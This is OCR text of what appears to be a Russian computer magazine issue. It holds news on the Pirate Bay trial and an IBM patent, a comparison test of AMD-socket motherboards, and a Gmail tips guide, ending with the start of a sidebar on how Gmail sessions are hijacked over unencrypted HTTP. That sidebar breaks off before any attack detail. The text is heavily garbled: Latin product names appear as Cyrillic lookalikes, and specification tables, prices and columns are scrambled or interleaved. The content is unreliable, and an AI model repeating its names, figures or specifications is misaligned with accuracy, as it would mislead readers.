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рвут И мечут, а сами подсудимые все больше шутят и называют процесс 
фарсом и спектаклем. Требования миллионных компенсаций их, похоже, 
не сильнотревожат. На пресс-конференции один из четверки (Питер 
Колмисоппи) заявил: «Неважно, сколько они потребуют— несколько 
миллионов или миллиардов. Мы не богачи иу нас нет денег, чтобы пла- 
тить. Они не получат ни цента». Впрочем, всем итакясно, что в Стокголь- 
ме судят нетолько этих четверых ребят, там судят весь интернет, саму 
передовую технологию, которая оказаласьтак неугодна сильным мира 
сего. На быстрый исходдела никто не рассчитывает, предполагают, что 
суд может растянуться на 3-5 лет. Пока ТРВ держится уверено — поло- 
вина обвинений была снята уже на второй деньелушаний. Обвинитель 
даже не смогдоказать, чтоторрент-файлы, представленные суду в 
качествеулик, использовались натрекере. 



90% всех кибер-атак, так или иначе, 
связаны с финансовыми или кредитными 
организациями. 

С экрана в жизнь 

Едва в Сеть просочилась информация о новом патенте компании ІВМ, 
вокруг него сразу вспыхнуло множество споров — оченьуж неод- 
нозначно выглядит разработка. И хотя патент быстро отозвали, осадок, 
что называется, остался. Суть проста — специалисты ІВМ, очевидно, 
смотрели «Матрицу», но в отличие от простых смертных, мотали на ус и 
вдохновлялись. Спустя 1 о лет после выхода картины на экраны в ІВМ, 
похоже, придумали устройство, позволяющее уклоняться от пуль. Од- 
нако трюков в стиле Нэо ожидать не стоит. Эта «персональная броня» 
предназначается в первую очередь для политиков и других публичных 
деятелей, на которых могут организовывать покушения. Согласно 
патенту, она способна самостоятельно лоцировать объекты, столкнове- 
ние с которыми угрожает«хозяину» летальным исходом, просчитывать 
их траекторию и... сбивать «хозяина» с ног, посылая в нужные мышцы 
шокирующий импульс. То есть, человек падает, как подкошенный, пуля 
[или ботинок, —Прим, ред.) пролетает мимо, задача выполнена. 
Звучит действительно фантастически, — и очень спорно, хотя бы исхо- 
дя из возможностей человеческого тела и скорости полета пули. Судя 
потому, что патент отозван, должно быть, ведется некая доработка. 
Подробности того, как именно все это функционирует, не раскрывают- 
ся, но о любопытной технологии мы явно еще услышим. 
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а Бочкц! 



ТЕСТ СОВРЕМЕННЫХ МАТЕРИНСКИХ ПЛАТ для ПРОЦЕССОРОВ АМ 



Многие фанаты мощных компьютеров не торопятся обновлять свои системы, 
особенно если те построены с использованием ЦП производства компании 
Асіѵапсесі Місго Оеѵісез. И дело не столько в повышении цен на импортные 
товары — сколько в появлении топовых моделей процессоров АМВ РЬепот II и 
соответствующих комплектующих. Это совершенно не значит, что существу- 
ющие модели, скажем, материнских плат под сокет АМ-2-Ь ни на что не годны. 
Как раз наоборот! Есть широкий выбор системной логики как от АМВ, так и 
ПѴІВІА (к слову, последние очень неплохо «поднялись» на высококлассных 
и/или дорогих решениях). 



в МЕТОДИКАТЕСТИРОВАНИЯ 

Теперь отом, как мы будем «мучить» наши модели для проверки их 
качества. 

По пунктам: 

1 . В первую очередь — это комплектация устройства. Куцая комплекта- 
ция — всегда серьезный минус, даже если материнская плата обладает 
супер-пупер характеристиками (на кой чертони нужны, если 5АТА- 
шлейфов не хватает). 

2. Затем мы оценим «начинку» самой платы и расположение компонен- 
тов. Отнашего внимания неуйдутни система охлаждения, ни количест- 
во разъемов. 

3. Ктестированию производительности мы подойдем следующим обра- 
зом: вначале прогоним известный, ноужедавно не новый ЗОМагк’06, 
затем проверим систему с помощью бенчмарка, встроенного в архива- 



тор ѴѴіпПаг (разумеется, используется многопоточный режим). 

4 . Игровой тест мы также не упустим. Пусть это будет РагСгу. 

5 . Напоследок (все замерено, значит можно издеваться над устройст- 
вом) мы проведем тест на устойчивость системы из утилиты ЕѵегезІ 
иШтаІе 4.50 (так называемый зігезз-іезі:). Параметром станеттемпе- 
ратура системного чипсета, замеряемая с интервалом дискретизации 
в две минуты. Проверка проводится без какого-либо оверклокинга, 
поскольку наша задача — проверить именно базовый (следовательно, 
самый распространенный) вариантсистемы. 

Пожалуй, по методике надо сделать несколько замечаний. Мы выбрали 
не самый новый бенчмарк от Риіигетагк и довольно старую игру по 
причинетого, что нам важно проверить работу встроенных графических 
адаптеров. При выставлении оценок серьезно учитывался показатель 
«цена/качество». Приступим! 
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[Конфигурация тестового стенда 



Процессор: АМО РЬепотХ4 9650 

Память, Гбайт: 2 (Сог5аігХМ52-8000 2x512 Мбайт. 0С2 РС2 8000 2x512 
Мбайт) 

Жесткий ДИСК: РАЮ о из двух Затзипд 80 ГбайтЗАТА II 
Видеокарта: ЗаррЫге АТІ Рабеоп НО 4870 
□ѴО-привод:16 63А-Н62М 
Корпус: ОМС Р2ТОАЗТ 
БП:ТЬегта[ТакеѴѴ0131РЕ850ѴѴ 
Операционная система: МісгозоО: ѴѴіпбоѵѵзХР 



Геггит 



РАРСРУ(РРБ) 


М5І 0КА7906Х 




бідаЬуІе МА7906Р-054Н 




Рохсопп А70А-5 




ВіозІагТА790СХА2+ 




А5ГОскА780РиІІН0 




А51І5 СгоззЬаіг II Рогтиіа 


0 10 20 30 40 50 60 70 80 90 



Ілабо различимая разница в показателях РР З объясняется различиями! 
іскорости работы драйверов каждой модели| 





А51І5 СгоззИаіг II Рогпгшіа 



[Технические характеристикіг 



[Технические характеристикіг 



Чипсет: АМО 7806 

Поддерживаемые процессоры: АМО РИепот/РИепотХА/РЬепот 
Хз/А*Ыоп б 4 Х 2 /А*Ыоп б4/А*Ыоп/А*И1оп 64 Х4/5етргоп 
Память: до 16 Гбр 4х01ММ 00Р2 ОІММ, 533 — Ю 66 МГц 
Слоты расширения: ІхРСІ-Ехргез 5 ХІ 6 рІхРСІ-Ехрге 55 ХІр 2 хРСІ 32 -бит 

Поддержка нескольких видеокарт: НуЬгісІ СгоззРігеХр встроенный 
графический ада птерАТІ Расіеоп НО 3300 

Интерфейсные разъемы: бхЗАТА Ир ІхІОЕрІхРОО 

Выходы на задней панели: 2хР5/2. 6x115В 2.0р 6 ЬЕ ЬАМр ОѴІр О-БУВр 

5 . 1 -канальное аудио 

• •••••••00 1800 руб ' 



Чипсет: ЫѴІОІАпРогсеувОаЗи 

Поддерживаемые процессоры: АМО РИепот/РИепотХ 4 /РЬепот 
Хз/А*И1оп 64 Х 2 /А*Ыоп б 4 /А*Ыоп/А*Ыоп 64 Х4/5етргоп 
Память: до 8 Гбр 4Х0ІММ 00Р2р 667 — Ю 66 МГц 

Слоты расширения: ЗхРСІ-Ехргеззхі 6 рІхРСІ-Ехргеззхір 2 хРСІ 32 -бит 
Поддержка нескольких видеокарт: ЫѴІОІАБЬІ 3 -ѵѵау 
Интерфейсные разъемы: 6х5АТА Ир ІхІОЕрІхРОО 
Выходы на задней панели: ІхР5/2.6хІ)5В 2 . 0рІхІЕЕЕі394рІхЕ-5АТАр 
2 х 6 ЬЕ ІАЫр НОМІр коаксиальный выхоДр оптический выхоДр О-БУВр 
7 . 1 -канальное аудио (в комплекте плата на РСІ-Ехргезз) 



8300 руб . 



5ГОскА78оРиІІНР 









Одно из самых мощных на сегодняшний день решений от АЗСЗ, — будет 
актуально даже после появления новых чипсетов и материнских плат на 
их основе. 

Модель показала хорошую производительность (тотжеѴѴіпВаг оказался 
на уровне в 1 1 56 Кб/с). Есть занятная опция для любителей «погонять 
камешки» — АЗС 3 СРП Ееѵеі Ср. Это настоящий «оверклокингдля чай- 
ников». Достаточно в ВІОЗ’е поставить соответствующую отметку, и сис- 
тема сама определит предельную частоту работы процессора. Выполняя 
разгон вручную (каконо везде обычно и бывает), можно добиться более 
серьезных результатов. В помощь оверклокерам и солидная система 
охлаждения: сложное соединение из медных радиаторов охватываетсе- 
верный и южный мосты, а также микросхемы в районе гнезда процессо- 
ра. Порадовала идущая в комплекте звуковая карта, которая помещается 
в разъем РСІ-ЕхргеззхІ . 

0 

Собственно, кроме цены, минусов замечено не было. 



Явныйлидерсреди дешевых материнских плат— всего 1800 рубликов, а 
со временем будетеще дешевле! Отсюда и заслуженный приз «Лучшая 
покупка». Выполненная в форм-факторе тАТХ, плата может быть уста- 
новлена в небольшие корпуса совершенно разных конфигураций. По 
сути, в модельустановлено все, что нужно для хорошей системы: есть 4 
разъема для оперативной памяти с частотой 1066 МГци порт РСІ-Ехргезз 
ХІ6 для видеокарты. Южный мост поддерживает до шести ЗАТА II. В 
материнскую плату можно установить любой процессор отАМВ под сокет 
АМ2/АМ2+ из имеющихся сегодня на рынке. 

0 

Чип РеаОек АЕС662 откровенно слабоват для серьезного аудио, однако 
дешевизна материнской платы позволяет на сэкономленные деньги 
купить что-нибудь а-ля СгеабѵеХ-Еі. 

Жаль, что нельзя установить две видеокарты (хотя требовать этого от 
материнской платы ценой менее 2000 руб. вряд ли разумно). Ктомуже, 
всегда есть вариант поставить Рабеоп НВ 4870X2. 
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СРЕДНЯЯ ТЕМПЕРАТУРА ЧИПСЕТА (ГРАДУСЫ) 
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Здесь вперед вырвался бідаЬуІе 



Температурные показатели всех плат довольно неплохи — впрочем, 
сейчас делать плохое охлаждение означаетзаранее обречь модель 
[ЩовалІ 



!на] 



Віо5ІагТА790бХ А2+^^^^^ИРохсопп А7РА-5 



Технические характеристики 



Технические характеристики 



Поддерживаемые процессоры: АМО РИепот/РИепотХА/РЬепот 
Хз/А*Ыоп 64 Х2/А*Ыоп б4/А*Ыоп/А*Ыоп 64 Х4/5етргоп 
Память: до 16 Гб, 4х01ММ 00Н2 ОІММ, 533 — Ю66 МГц 
Слоты расширения: 2хРСІ-Ехрге55ХІ6,2хРСІ-Ехргѳ55ХІ,2хРСІ 32-бит 

Поддержка нескольких видеокарт: НуЬгісІ СгоззРігеХ, встроенный 
графический ада птерАТІ Расіеоп НОззоо 

Интерфейсные разъемы: 6х5АТА II, ІхШЕ,ІхРОО 

Выходы на задней панели: 2хР5/2.4х1)5В 2.0, ІхІЕЕЕі394,ІхЕ-5АТА, 

бЬЕЬАЫ, НОМІ, ОѴІ, 0-51ІВ, 7.1-канальное аудио. 



Чипсет: АМВ7900Х 

Поддерживаемые процессоры: АМВ РІіепот/АІІіІоп 64 РХ/АІИІоп 64 
Х2/А*Ыоп б4/5етргоп 

Память: до 8 Гб, 4хВ1ММ □ВР2 ВІММ, 533 — Ю66 МГц 

Слоты расширения: 2хРСІ-Ехргез5ХІ6, 2хРС1-Ехргез5 XI, 2хРС1 32-бит 

Поддержка нескольких видеокарт: НуЬгісІ СгоззРігеХ, встроенный 

графический ада птерАТІ Расіеоп НОззоо 

Интерфейсные разъемы: бхЗАТА II, ІхІОЕ,ІхРОО 

Выходы на задней панели : 2хР5/2. 4хУ5В 2.0, ІхІЕЕЕі394а, ОЬЕ ЬАМ, 

НОМІ, ОѴІ, 0-5УВ, 7.1-канальное аудио 




т 

Создается ощущение, что разработчики решили сделать некую «сред- 
нестатистическую» материнскую плату. Но и тутесть своя изюминка, 
а именно — функция Стагі: Рап. На первый взгляд может показаться, 
что это просто регулятор скорости вращения вентиляторов. Однако 
если начать разбираться, то оказывается, что эта система позволяет 
создать множество пользовательских режимов работы — в том числе, с 
нелинейной зависимостью скорости вращения кулера оттемпературы 
охлаждаемого компонента. 



Рохсопп А7ВА-5 — наиболее сбалансированная из всех представлен- 
ных в тесте материнских плат на чипсете 7906Х. Во-первых, скажем 
про хорошую конфигурацию элементов и выводов на задней панели. 
Во-вторых, В 105 явно ориентирован наоверкловеров — внемочень 
много настроек. В-третьих, система охлаждения в штатном режиме 
справляется со своими функциями «на отлично» (а вот для установле- 
ния рекордов придется ее модернизировать). 



О О 




0 

Нет разъемов РігеѴѴіге (хоть они и нетак часто используются в настоя- 
щее время]. Более серьезный недостаток — отсутствие еЗАТА-разъема. 
Учитывая, что чипсет поддерживаетэту функцию, решение исключить 
е5АТА-порт из платы более чем непонятно. Также не понравилось, что 
при включении одной видеокарты в РСІ-ЕхргеззхІб, второй разъем 
нужно затыкать специальной картой -заглушкой. На наш взгляд, это не 
очень-то удобно. 



0 

Всего четыре порта Н5В 2.0 — сегодня это уже маловато (стандартом 
считается цифра «6»). Также немного огорчает отсутствие еЗАТА- 
разъема на задней панели — вполне можно было бы вывести его туда, 
особенно сучетом стоимости платы. Вообще, откровенно говоря, 
плата, несмотря на свои достоинства, — переоцененная. За те же 
деньги можно приобрести модели намного лучше от производителей, 
считающихся более надежными и престижными. 



► 018 
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А51І5 СгоззЬаіг II Рогтиіа 
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Разницы в результатах почти нет — а значит, все платы раб отают с при-| 
^іизительно одинаковой производительностью. ЭторадуеТІ 





бідаЬуІе МА7906Р-054Н 



Технические характеристики 



Чипсет: АМ0 7900Х 

Поддерживаемые процессоры: АМО РИепот/АІЫоп 64 РХ/А*Ыоп 64 
Х 2 /АІИІОП б4/5етргоп 

Память: до 16 Гб, 4Х0ІММ 00Р2 ОІММ, 66 ? — 1066 МГц, 

Слоты расширения: 2 хРСІ-Ехрге 55 ХІ 6 ,ЗхРСІ-Ехргѳ 55 ХІ, 2 хРСІ 32 -бит 

Поддержка нескольких видеокарт: НуЬгісІ СгоззРігеХ, встроенный 
графический ада птерАТІ Расіеоп НОззоо 

Интерфейсные разъемы: 6х5АТА II, ІхШЕ,ІхРОО 

Выходы на задней панели: 2хР5/2. 4х115В 2 . 0 , ІхІЕЕЕі 394 а, ОЬЕ ІАМ, 

НОМІ, ОѴІ, 0-5УВ, 7 . 1 -канальное аудио, оптический выход 



ООО 



4900 руб. 



5500 руб. 



МБІ ОКА790СХ 



Технические характеристики 



Чипсет: АМВ7900Х 

Поддерживаемые процессоры: АМВ РИепот/АІИІоп 64 РХ/АІІіІоп 64 
Х 2 /А*Ыоп б4/5етргоп 

Память: до 8 Гб,4х01ММ 00^2 ВІММ, 667 — 1066 МГц 

Слоты расширения: 2 хРСІ-Ехргеззхі 6 , 2хРС1-Ехргезз XI, 2хРС1 32 -бит 

Поддержка нескольких видеокарт: НуЬгісІ СгоззРігеХ, встроенный 

графический адаптер АТІ Расіеоп НОззоо 

Интерфейсные разъемы: 5х5АТАІІ,ІхІОЕ,ІхРОО 

Выходы на задней панели: ІхР5/2. 6х1)5В2. 0 , ІхІЕЕЕі 394 р ОЬЕ САМ, 

НОМІ, ОѴІ, 0-5УВ, 7 . 1 -канальное аудио, оптический выход, ІхЕ-5АТА 



К конструкции материнской платы, в принципе, вопросов нет. Единст- 
венное — один из РСІ Ехргезз х1 расположен вплотную с охлаждаю- 
щей системой, что может вызватьтрудности при установке. Элементы 
на плате размещены очень компактно, что, кстати говоря, совсем не 
повлияло на качество охлаждения системы. Оверклокерские возмож- 
ности у этой модели неплохие — хорошее охлаждение и стабильные 
компоненты. Плюс ко всему, заявлена поддержка существующих и 
будущих моделей процессоров от АМВ. 

0 

При установке двух видеокарт одна из них закрывает порты 5АТА II. От- 
метим также «традиционную» болезнь материнских плат, основанных 
на наборе системных логик АМВ 7906Х, — отсутствие еЭАТА-разъема 
(опять же, неясно, зачем экономят — ведь функционал с еЭАТА сильно 
расширяется!). 



Эта плата привлекала нас с самого начала. Чем? Ну, во-первых, своей 
хорошей системой охлаждения, построенной потрадиционной цир- 
кулярной схеме из нескольких радиаторов. Принцип построения не 
является чем-то новым, однако главное не новизна, а эффективность 
— чипсетспокойно выдержал стресс-тести едва нагрелся при разгоне. 
Естьаппаратное управление разгоном — специальный блок рычажков, 
управляющий частотой ЦП. Это, в принципе, необязательно — в ВІОЭ’е 
все настройки есть, но за такое дополнение ставим однозначный плюс 
разработчикам. Имеется полный комплект разъемов, втом числе, 
пресловутый еЭАТА, который отсутствует во многих других платах. Таким 
образом, мы получаем хорошую стабильную «материнку» с полным функ- 
ционалом и хорошими возможностями для оверклокинга. 



0 



Серьезных минусов в принципе нет. Даже стоимость устройства более 
адекватная, нежели удругих моделей этого ценового диапазона. 



Н ВЫВОДЫ зованы преимущества чипсета АМО 7906Х. «Лучшую покупку» 

Приз «Выбор редакции» получает плата М5І ВКА7906Х, как забирает Аз го скА780ЕииНВ — плата, которая позволяет о р га - 

обладающая наиболее полным набором возможностей инаибо- низовать неплохую систему с малыми затратами и в небольшом 
лее стабильная. Атакже потому, что в ней лучше всего реали- корпусе. 
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ПРАВИЛЬНЫМ 
ПОЧТОВИК 



ОТбООСЬЕ 



большой мануал по грамотному переходу на омаіь.сом 




Первое ощущение недовольства появляется, когда ты в очередной раз нахо- 
дишь важное письмо по ошибке попавшим в папку «Спам»" Затем гнев на- 
растает,” почтовик без спросу удалил аттачи, ссылаясь на то, что они могут 
быть опасны. В конец же терпение лопается, когда из-за квот на объем поч- 
тового ящика приходится удалять внушительную пачку писем. Хватит! 



еня окончательно перестала устраивать корпоративная 
почта. Когда квоты начали серьезно напрягать, а действия 
спам-фильтра перестали поддаваться вообще какой-либо 
логике, с корпоративным Ехсбапде’ем пришлось попро- 
щаться. Полностью! По правде говоря, альтернативу я искал недолго, а 
вернее — не искал вообще. Кэтому времени почти вся доблестная ре- 
дакция уже вовсю юзала и нахваливала Отаіі, а поэтому выбор сервиса 
был, по большей части, очевиден. И если на первых порах некоторые 
вещи в новом почтовике мне казались неудобными, то сейчас я струдом 
представляю, что они могут быть устроены как-то иначе. 

Н ПОЧЕМУ 6МАІІ? 

Тому есть несколько причин. Во-первых, мне нравится концепция «вез- 
де и всегда». Не надо морочить себе голову установкой и настройкой 
почтового клиента, синхронизацией базы между разными компьютера- 
ми и прочей ерундой. Нужен браузер — и только. Если раньше большим 
бонусом десктопных клиентов можно было назвать автономную работу 
без Сети, то Отаіітеперьтакже умеет работать ойИпе, позволяя, ктому 
же, комфортно пользоваться сервисом даже на плохом канале. 
Отсутствие каких-либо квот — это второй аргумент «за». Пока я еще не 
встречал людей, которые смогли бы забить выделенные на ящик7 Гб :). 
Да что там — нет даже таких, которые пытались бы доказать, что это во- 
обще возможно. Получается, пропадает всякая необходимость что-либо 
удалять: места хватит на все. 



Обучаемый пользователями спам-фильтр настолько хорош, что когда-то 
я даже не поленился заюзать вспомогательный аккаунт на Отаіі’е в 
качестве посредника, который фильтровал почту и отсылал ее обратно 
без спама на мой корпоративный ящик (подробности — во врезке). Из 
300-400 спамовых писем в деньсистему пробиваетмаксимум одно-два. 
Перейти на Стай можнотолько ради этого! 

Удобнейший интерфейс по достоинству начинаешь ценить после 
нескольких дней работы. Система фильтров умело выставляет метки (так 
называемые ІаЬеІз) на разные группы писем, позволяя быстро по ним 
ориентироваться. Эти метки долгое время заменяли систему папок, при- 
нятую в большинстве почтовых приложений, что отталкивало привык- 
ших к О иНооку и Тбе ВаС’у пользователей. Нои это теперь не проблема: 
папки с недавнего времени появились в Стай. 

И последнее (но отнюдь не последнее по важности) — это 99% аптайм. 

На моей памяти, Отаіі падал всего несколько раз. Последний даун был 
в двадцатых числах февраля, когда сервис лежал более 3 часов, но это 
редкое исключение из правил. За надежность спецы из боодіе отвечают 
головой! 

В ТРИКО: ИСПОЛЬЗОВАТЬ АНГЛИЙСКУЮ ВЕРСИЮ СЕРВИСА 

Перейти на Отаіі несложно: регистрация открыта всегда и для всех, но 
мы подготовили для тебя самый полный мануал по различным триксам и 
тонкостям, которые помогут использовать сервис на полную катушку. 
Перед тем, как начать, хочу предупредить, что ссылки и опции будут 
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указаны на английском языке. Зачем? Ведь Отаііотлично поддержива- 
ет кириллицу и болеетого, скорее всего, самостоятельно установит ее в 
качестве основного языка?Тутесть важный нюанс. Все нововведения и 
фишки в Отаіі появляются именно в английской версии итолько потом 
перебираются в локализированные варианты. Отставать мы нехотим, а 
поэтому будем юзать только ЕпдбзЬ вариант! 



В ТРИК2:6МА11ИП0ИСК60061Е 

Ооодіе не был бы Гуглом, если бы не реализовал в почтовике мощную 
поисковую систему. Ей без труда может воспользоваться каждый, но что- 
бы искать еще эффективнее, предлагаю взять на вооружение несколько 
ключевых команд, которые можно использовать в запросах: 



г ТРИК1: ЗАБИРАЕМ ПОЧТУ С РАЗНЫХ ЯЩИКОВ 



:Егот: <отправитель> — явное указание отправителя письма 
(необязательно полностью) 



Итак, решено — переходим на альтернативный сервис. Но как— не отка- 
зываться же полностью отсвоего корпоративного ящика, указывая везде 
новый адрес на ОтаіГе? Да и как получать почту со своего ящика? С 
последним вопросом все просто, и самый очевидный вариант— настро- 
ить переадресацию. В моем случае: зіерйгеаі. хакер. ги зіерап.ііуіпй 
д та і [.сот. Но в случае с 6 таіі мы та к делать не будем! :) Дело в том, что 
это не просто почтовый сервис, предоставляющий удобный интерфейс 
через веб. В действительности, это самая обычная почтовая программа, 
стой лишь разницей, что работаетона в браузере. Получается, что с 
ее помощью, ты отлично можешьзабирать почту слюбого количества 
ящиков по привычному протоколу РОРЗ. Все настраивается точнотак 
же, какв Оииоок’е или ВаПе. Для этого переходим в Зеиіпдз и выбираем 
вкладку с настройками аккаунтов Ассоипіз. Находим там секцию Оеітаіі 
^гот оІЬегассоипІз и, собственно, выбираемто, за чем сюда пришли 
— Абб апобзег таіІассоипЕ Чтобы добавить новый аккаунт для сбора 
почты, указываются вполне банальные вещи: непосредственно етаіі, 
логин/пароль на ящик и адрес РОРЗ-сервера. При желании можно вклю- 
чить постоянное 55Е-шифрование, а также указать, оставлятьли копии 
писем на сервере или нет. Все, теперь почта автоматически будетзаби- 
раться бтаіГом и после обработки спам-фильтром размещаться в папке 
ІпЬох. Обрати внимание: если в ящике натвоем старом сервере было 
много писем (например, еслиты работал с ним по ІМАР или по протоколу 
ЕхсЬапде сервера), то Отаіі не сможетзабрать все сразу. Видимо, чтобы 
не перегружать сервера, сервис будет аккуратно забирать по 300 писем 
за раз, после чего делать небольшую паузу. Удобнее всего — и именно 
такя и сделал — оставить его заниматься этим ночью. 

Другой важный нюанс — адрес отправителя. Ксожалению, в корпоратив- 
ной и бизнес сфере не всегда можно указать просто свой адрес на Отаіі. 
Письма с непонятного адреса на бесплатном почтовом сервисе многим 
людям могут показаться подозрительными, особенно если раньшеты 
писал им с другого ящика. Но и это решаемо: Отаіі позволяет в поле 
отправителя вставить любой адрес. Для этого в настроках, в той же самой 
вкладке Ассоипіз кликнуть по ссылке Абб апобзегетаііаббгеззуои оѵѵп 
и указать нужныйтебе етаіі. После несложной процедуры верификации 
(мыло Димы Медведева, увы, неуказать) отпадутнаши последние про- 
блемы. Никто даже и не заподозрит, чтоутебя что-то изменилось. 



зиЬбесЬ : <тема> — тема письма 

ІаЬеІ :<метка> — поиск писем с заданной меткой 
Сііепате : <название аттача> — поиск по названию файла в 
приложении 

іп: ІпЬох/ іп:1:газ]і/іп: зрат — поиск в нужных папках 
із:з1:агге(і — поиск «звезданутых» писем : ) 
із :ипгеай/із : геай — поиск среди непрочитанных и прочи- 
танных писем соответственно 
із:сЬаЬ — поиск в логах чата 

Например, запросом «Ігот:пікі 1 :о 2 [аЬеІ:редакция І5:ипгеаб Параметры 
І1:р»я найду все непрочитанные письма от Никиты — с пометкой «ре- 
дакция» и содержащие слова «параметры б;р». Удобно? Я уже настолько 
привыкктаким обозначениям, что набираю их машинально (хотя кому-то 
придется по душе вводить параметры в специальные поля для поиска 
— кнопка ЗЬоѵѵзеагсЬ орбопз). 

В ТРИКЗ: ВКЛЮЧАЕМ ОПЦИИ ИЗ 6МАІІІАВ5 

Ребята из боодіе либо очень скромные, либо никуда не спешат. Мало 
того, что, несмотря на несколько лет существования сервиса, рядом 
с логотипом по-прежнему красуется слово «Веіа» (и, по заявлениям 
разработчиков, будет сопровождать его на протяжении всей жизни 
проекта), так еще и все свои нововведения они сначала тестируют на 
кучке энтузиастов. Таким энтузиастом может стать любой, включив 
экспериментальные опции в специальном разделе Отаб ЕаЬз (зеле- 
ная колбочка в самом верхнем меню). Разберем наиболее интерес- 
ные из НИХ: 

О^^ііпе — включает возможность работы с Ота б офлайн (читай три к №4); 
Тазкз — списокдел (іобоіізі:) прямо в интерфейсе гуглопочты; 

Оиіск Еіпкз — быстрые линки для хранения букмарков ил и, например, 
частых поисковыхзапросов; 

Зідпаіиге Іѵѵеакз — добавляет к каждому письму заданную подпись; 
МаѵЬагбгад апб бгор — позволяет разместить все панели интерфейса 
так, кактебе удобно; 

Сизіот ЕаЬеІСоІогз — позволяет задать цвета для различых меток 
(ІаЬеІз); 

МиШрІе ІпЬохез — несколько панелей в окне Отаб; 
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• В одном из про- 
шлогодних номеров 
мы уже рассказыва- 
ли о замечательном 
мессенджере от 
Ооодіе — біаік, 
построенном на 
протоколеХМРР 
(^аЬЬег). Каждый 
участник Отаіі по- 
лучает идентифика- 
тор в этой системе 

и может общаться 
с ^аЬЬег-пользо- 
вателями прямо из 
оболочки сервиса. 
После подставы, 
которую учудила 
АОІ, отключив 
альтернативные 
клиенты для русско- 
го сегмента инета, 
это становится еще 
более актуальным. 
Амы ведь говорили, 
что так и будет :). 

• К слову, о вирту- 
альных дисках в 
системе, созданных 
с помощью почтовых 
ящиков. Отаіі — это 
не единственный 
вариант. Прога 
ѴотЬаІо Маіі Огіѵе 
[ ѵѵѵѵѵѵ.ѵоппЬаІо.сопп ) 
позволяет сделать 
дискиз любого 
аккаунта, имеющего 
доступ по протоколу 
РОРЗ. 
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ЕсіІІ ІаЬеІз 



Система метоки, с недавнего времени, папокв Оппаіі’^ 



Сгеаіеа Ооситепі — создание документа на базе просмат- 
риваемого письма; 

Ооодіе Оос5 дасідеі — быстрый доступ к документам в 
Ооодіе 0ос5. 

Н ТРИК4: СУПЕРБЫСТРЫЙ 6МАІІ ОФЛАЙН 

Свершилось! Единственного ограничения веб-сервиса, 
из-за которого пользоваться почтой можно было лишь в 
онлайн, больше нет! Отаіі отныне работает даже в том 
случае, когда ты отключен от Сети. Я практически убежден, 
что сама платформа Ооодіе Оеагз, позволяющая перевес- 
ти онлайн-приложение в офлайн форму, во многом была 
задумана ради того, чтобы сделать подобный апгрейд для 
Стаіі. И результат работы спецов из Соодіе’а, вызывает 
большое уважение. 

Ну, во-первых, это банально работает :). Можно, не задумы- 
ваясь, набирать в браузере «дтаіі.сот» и быть уверен- 
ным, что страничка откроется, независимо оттого, есть 
подключение к Сети или нет. Правда, такую возможность 
предварительно нужно активировать в Стаіі ЕаЬз, а затем 
установить на нужном компьютере, нажав на кнопку ОІІІіпе 
в верхней части интерфейса. И да: это придется выполнить 
на каждой машине, где ты собираешься работать без Сети. 
Смысл заключается в том, что Стаіі создаст на локальной 
машине локальную базу с сообщениями, где разместит 
скачанные из инета письма. Можно задать параметры для 
хранения сообщений и не забирать себе на комп письма 
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с большой давностью, которые едва ли понадобятся тебе 
в срочном порядке. И уж, конечно, едва ли стоит сливать 
себе содержимое папокСрат и Тгазб — ксчастью, Стаіі 
этого и не делает. Отдельный разговор — это аттачи. В 
параметрах офлайн режима ты можешьуказать максималь- 
ный размер приложения, которое система будет выкачи- 
вать в локальную базу. 

Во-вторых, это работает прозрачно. Переход между ло- 
кальным и онлайн режимами происходитавтоматически, 
без необходимости переключаться вручную. Многие фичи 
гуглопочты останутся стобой даже при отключении доступа 
в интернет. Это и темы оформления, и горячие клавиши, и 
даже Стаіі ІаЬз. 

Гвоздь нашей программы — офигенный режим Ріаску 
Соппесііоп, который особенно пригодится вусловиях 
наших российских реалий. Стаіі в таком режиме работает 
с локальным кэшем, а изменения лишь иногда подгружа- 
ет в фоновом режиме. В итоге, даже на самом фиговом и 
нестабильном инете мы получаем чрезвычайно шустрый 
сервис без малейшего намека на тормоза. 

Н ТРИК5: ОМАМ — ОТДЕЛЬНОЕ ПРИЛОЖЕНИЕ 

Тебя смущает, что Стаіі открывается в отдельной вкладке 
браузера наравне со всеми остальными страницами? По- 
нимаю, — я сам иногда теряю его среди десятков открытых 
табов. Но благодаря возможностям Ооодіе СЬготе І ѵѵѵѵѵѵ. 
доодІе.сот/сЬготе ). из Стаіі можно сделать самое обыч- 
ное приложение. Да что говорить — даже во время установ- 
ки оііііпе-режима тебе будет предложено создать иконки 
на рабочем столе и в панели быстрого запуска. Добиться 
того же результата позволяет проект от МогіИа — Ргізт 
[ ІаЬ5.то2ІІІа.сот/рго]есІз/ргІ5т ). который работает как под 
Виндой, так и МасОС, и Еіпих. Кстати, для пользователей 
продукции Стива Джобса существует очень мощное при- 
ложение Маііріапе [ таііріапеарр.сот ]. представляющее 
собой полноценный десктопный почтовик на базе Стаіі. 

В ТРИК6: ИНТЕГРИРУЕМ 6МАІІ В СИСТЕМУ 

Большой плюс обычного десктоп н ого почтовика в том, 
что он может серьезно интегрироваться в систему. С 
веб-сервисом все намного печальнее. Вот, скажем, для 
отправки аттача через Стаіі нужно сначала открыть стра- 
ницы с сервисом, уже там выбрать файлы и нажать кнопку 
«Приложить к письму». Р-р-р-р! А ведь куда удобнее най- 
ти их в системе и в контекстном меню выбрать «СепсІ Ьу 
Стаіі» или вообще бгад’п’сігор’ом кинуть в окно браузе- 
ра. Собственно, именно это и позволяет сделать утилита 
дАіІасб, которую после серьезного апгрейда разработчи- 
ки обозвали А^Лха [ ѵѵѵѵѵѵ.аіііха.сот ]. Более того, из самых 
распространенных приложений (Місгозоіі Оібсе, АбоЬе 
АсгоЬаІ и т.д.) ты можешь послать документ напрямую 
через гуглопочту. Программа также перехватывает клики 
по ссылкам таіііо, предоставляя пользователю окошко 
для выбора почтового клиента, — помимо всего прочего, 
в нем есть Стаіі и почтовый сервис от другого поискового 
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гиганта — УаЬоо! Маіі. Кстати, одна из последних сборок Оперы (на- 
чинаясВиіІб 1 229) также включает подобную возможность. Клик по 
ссылке таІКо открывает диалоговое окно, где можно переключиться 
между Орега Маіі (М2), десктопным клиентом и несколькими веб- 



Как ломают СтаіІ! 

Большая проблема современных веб-сервисов в том, что 55Ь-шиф- 
рование используется только во время аутентификации. Далее, в 
целях экономии трафика и увеличения быстродействия, данные 
передаются по обычному НТТР-каналу со всеми вытекаюш;ими 
последствріями. Разобраться, уязвим сервис или нет, очень просто. 
Адресная строка во время авторизации на сервере выглядит при- 
мерно так: 

ІіССрз : //ѵллм. доодіе . сот/ассоипСз/ЗегѵісеЬодіп? . . . 

